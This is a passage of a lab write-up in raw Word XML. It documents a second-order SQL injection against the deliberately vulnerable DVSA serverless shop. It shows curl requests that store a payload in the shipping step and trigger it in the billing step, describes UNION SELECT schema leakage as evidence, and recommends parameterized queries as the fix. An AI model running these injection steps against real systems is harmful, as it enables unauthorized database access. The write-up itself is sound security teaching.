                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> -X POST </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"$API_URL"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="6C7086"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17E26BD9" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -H </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"Content-Type: application/</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="6C7086"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="645025D8" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -H </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"Authorization: $JWT_TOKEN"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="6C7086"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71C8AA47"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d </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3A396BB1" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "action": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"shipping"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47E52F8E"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order</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-id": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F9E2AF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"'$ORDER_ID'"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E5E34A6" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "data</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>": {</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3F16AAE2" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      "address": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"123 Hacker Way"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63A66D20" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      "email": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"hacker@example.com"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B55A57" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      "name": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F38BA8"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"SQL Injector"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02577CCC"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
          <w:p w14:paraId="715B52A2" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  }'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19F96E7C" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash — Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Binding shipping data to the generated order-id to advance the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11105215" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3 — Trigger the Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A29AA99" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Submit the billing request to force the backend to evaluate the cart total, which reads the stored item and executes the SQL payload against the inventory database:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="89B4FA"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="F38BA8"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="89B4FA"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="89B4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2B5" w14:paraId="2AAECD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20" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6B82878C" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="89B4FA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> -X POST </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"$API_URL"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="6C7086"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0996E925" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -H </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"Content-Type: application/</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="6C7086"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D7AD77A" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -H </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"Authorization: $JWT_TOKEN"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="6C7086"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA95582"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d </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="37425589" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "action": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"billing"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06D8459C"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order</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-id": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F9E2AF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"'$ORDER_ID'"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F3272C" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "data</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>": {</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="583290FC"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ccn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F38BA8"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"4242424242424242"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F0F0C2" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      "exp": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"11/25"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04511AD2"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cvv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"123"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="367EA3AF" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="335A4FA9" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  }'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F003073" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash — Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Triggering the billing endpoint to activate the delayed SQL payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154F6DDE" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 5 — Evidence and Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23369912" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The execution of the injected SQL payload is confirmed by inspecting the backend logs. The log entry demonstrates that the UNION SELECT statement successfully manipulated the database </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>query. Instead of returning a standard numerical price, the database exposed its hidden schema metadata, returning the table name (inventory) directly to the application logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009AFC98" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 6 — Fix Strategy / Probable Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D8F768" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability must be fixed within the database query logic of the DVSA-GET-CART-TOTAL Lambda function. The system must ensure that untrusted values are never concatenated directly into SQL queries, regardless of the pipeline stage. The correct mitigation is to replace the string concatenation with parameterized queries (prepared statements). This forces the database to treat the input strictly as literal data rather than executable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229846B9" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 7 — Code / Config Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DDE266" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The fix was applied to get_cart_total.py inside the DVSA-GET-CART-TOTAL Lambda function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49434FED" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Before — Vulnerable Code</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="89B4FA"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="F38BA8"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="89B4FA"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="89B4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2B5" w14:paraId="327091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20" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="365E0E04" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="6C7086"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
